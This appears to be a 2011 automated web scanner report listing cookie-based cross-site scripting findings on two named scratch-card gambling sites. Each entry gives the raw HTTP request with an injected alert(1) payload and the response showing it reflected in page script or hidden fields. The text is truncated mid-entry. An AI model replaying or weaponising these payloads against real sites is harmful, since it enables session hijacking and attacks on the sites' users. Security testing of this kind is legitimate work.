HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:34:48 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 23675 Content-Type: text/html Set-Cookie: ARC=130137d0f4e%22 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <img src='http://trk ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /contactus.asp |
GET /contactus.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=1301379bbe1'%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:35:06 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 25569 Content-Type: text/html Set-Cookie: ARC=1301379bbe1%27 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <1281) { sb = "yes"; } window.open('https:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /contactus.asp |
GET /contactus.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137e31ab--><script>alert(1)< |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:35:08 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 25617 Content-Type: text/html Set-Cookie: ARC=130137e31ab%2D%2D%3E Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <input type=hidden name ="AR" value ="130137e31ab--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /contactus.asp |
GET /contactus.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=13013783b35"%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:35:05 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 25569 Content-Type: text/html Set-Cookie: ARC=13013783b35%22 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <img src='http://trk ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /fairplay.asp |
GET /fairplay.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=1301374224f"%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:34:45 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 22374 Content-Type: text/html Set-Cookie: ARC=1301374224f%22 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <img src='http://trk ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /fairplay.asp |
GET /fairplay.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137498e3'-alert(1)- |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:34:47 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 22340 Content-Type: text/html Set-Cookie: ARC=130137498e3%27 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <1281) { sb = "yes"; } window.open('https:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /fairplay.asp |
GET /fairplay.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137bcf11--><script>alert(1)< |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:34:49 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 22388 Content-Type: text/html Set-Cookie: ARC=130137bcf11%2D%2D%3E Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <input type=hidden name ="AR" value ="130137bcf11--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /help.asp |
GET /help.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=1301373e18c"%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:34:47 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 20819 Content-Type: text/html Set-Cookie: ARC=1301373e18c%22 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <img src='http://trk ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /help.asp |
GET /help.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137fd99e--><script>alert(1)< |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:34:50 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 20861 Content-Type: text/html Set-Cookie: ARC=130137fd99e%2D%2D%3E Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <input type=hidden name ="AR" value ="130137fd99e--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /help.asp |
GET /help.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=1301374be8c'%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:34:48 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 20819 Content-Type: text/html Set-Cookie: ARC=1301374be8c%27 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <1281) { sb = "yes"; } window.open('https:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /index.asp |
GET /index.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137f0367"%3balert(1)/ |
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 16 May 2011 12:34:41 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 7618 Content-Type: text/html Set-Cookie: ARC=130137f0367%22 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <img src='http://trk ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /index.asp |
GET /index.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137b79ec'%3balert(1)/ |
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 16 May 2011 12:34:41 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 7618 Content-Type: text/html Set-Cookie: ARC=130137b79ec%27 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <1281) { sb = "yes"; } window.open('https:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /index.asp |
GET /index.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=1301378b084--><script>alert(1)< |
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 16 May 2011 12:34:43 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 7666 Content-Type: text/html Set-Cookie: ARC=1301378b084%2D%2D%3E Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <input type=hidden name ="AR" value ="1301378b084--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /media.asp |
GET /media.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=13013721188'%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:35:08 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 22115 Content-Type: text/html Set-Cookie: ARC=13013721188%27 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <1281) { sb = "yes"; } window.open('https:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /media.asp |
GET /media.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137b2ff5"%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:35:07 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 22115 Content-Type: text/html Set-Cookie: ARC=130137b2ff5%22 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <img src='http://trk ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /media.asp |
GET /media.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137df65f--><script>alert(1)< |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:35:10 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 22163 Content-Type: text/html Set-Cookie: ARC=130137df65f%2D%2D%3E Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <input type=hidden name ="AR" value ="130137df65f--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /playersclub.asp |
GET /playersclub.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=13013774d6f--><script>alert(1)< |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:34:49 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 25909 Content-Type: text/html Set-Cookie: ARC=13013774d6f%2D%2D%3E Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <input type=hidden name ="AR" value ="13013774d6f--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /playersclub.asp |
GET /playersclub.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=1301376b0bd'-alert(1)- |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:34:47 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 25861 Content-Type: text/html Set-Cookie: ARC=1301376b0bd%27 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <1281) { sb = "yes"; } window.open('https:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /playersclub.asp |
GET /playersclub.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137a817f"%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:34:45 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 25895 Content-Type: text/html Set-Cookie: ARC=130137a817f%22 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <img src='http://trk ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /promotions.asp |
GET /promotions.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=13013735b5a'%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:34:46 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 21949 Content-Type: text/html Set-Cookie: ARC=13013735b5a%27 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <1281) { sb = "yes"; } window.open('https:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /promotions.asp |
GET /promotions.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137b3df5--><script>alert(1)< |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:34:50 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 21997 Content-Type: text/html Set-Cookie: ARC=130137b3df5%2D%2D%3E Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <input type=hidden name ="AR" value ="130137b3df5--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /promotions.asp |
GET /promotions.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=13013733310"%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:34:45 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 22051 Content-Type: text/html Set-Cookie: ARC=13013733310%22 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <img src='http://trk ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /terms.asp |
GET /terms.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=13013760ce4"%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:35:06 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 57467 Content-Type: text/html Set-Cookie: ARC=13013760ce4%22 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <img src='http://trk ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /terms.asp |
GET /terms.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=13013793635'%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:35:08 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 57467 Content-Type: text/html Set-Cookie: ARC=13013793635%27 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <1281) { sb = "yes"; } window.open('https:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /terms.asp |
GET /terms.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137ea9da--><script>alert(1)< |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:35:10 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 57515 Content-Type: text/html Set-Cookie: ARC=130137ea9da%2D%2D%3E Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <input type=hidden name ="AR" value ="130137ea9da--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /underage.asp |
GET /underage.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137bcba7'%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:35:07 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 20446 Content-Type: text/html Set-Cookie: ARC=130137bcba7%27 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <1281) { sb = "yes"; } window.open('https:/ ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /underage.asp |
GET /underage.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137f7ff5--><script>alert(1)< |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:35:09 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 20494 Content-Type: text/html Set-Cookie: ARC=130137f7ff5%2D%2D%3E Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <input type=hidden name ="AR" value ="130137f7ff5--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.primescra |
Path: | /underage.asp |
GET /underage.asp HTTP/1.1 Host: www.primescratchcards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ARC=130137ba420"%3balert(1)/ |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:35:06 GMT Server: Microsoft-IIS/6.0 P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP" X-Powered-By: ASP.NET Content-Length: 20446 Content-Type: text/html Set-Cookie: ARC=130137ba420%22 Cache-control: private <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Prime Scratch Car ...[SNIP]... <img src='http://trk ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratch2cash |
Path: | / |
GET / HTTP/1.1 Host: www.scratch2cash.com Proxy-Connection: keep-alive Referer: http://www.scratch2cash User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Cache-Control: private Date: Mon, 16 May 2011 12:46:57 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:46:57 GMT; path=/ Set-Cookie: BO=FMf7dca"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:46:57 GMT; path=/ Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:46:57 GMT; path=/ Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/ Vary: Accept-Encoding Content-Length: 44002 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = "FMf7dca"-alert(1)- // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat strRegistra ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratch2cash |
Path: | / |
GET / HTTP/1.1 Host: www.scratch2cash.com Proxy-Connection: keep-alive Referer: http://www.scratch2cash User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Cache-Control: private Date: Mon, 16 May 2011 12:46:54 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PMafe5d" Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:46:54 GMT; path=/ Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:46:54 GMT; path=/ Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:46:54 GMT; path=/ Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/ Vary: Accept-Encoding Content-Length: 44002 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... nMode, pBonusOption) { // ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PMafe5d"-alert(1)- var strBonusOption = "FM"; // B. Allow banners to override the page data with their own parameters (banner scope) if(typeof(pRegistrat ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.scratch2cash |
Path: | /AboutUs.aspx |
GET /AboutUs.aspx HTTP/1.1 Host: www.scratch2cash.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UniqueVisitorID |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:45:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:33 GMT; path=/ Set-Cookie: BO=FM1a06c"-alert(1)- Set-Cookie: UniqueVisitorID Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:33 GMT; path=/ Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:33 GMT; path=/ Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 49076 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_htmlMaster" xmlns="http://www.w3.org <hea ...[SNIP]... / ** Registration-Mode and Bonus-Option Initialization // A. Initialize using the master page parameters (page scope) var strRegistrationMode = "PM"; var strBonusOption = 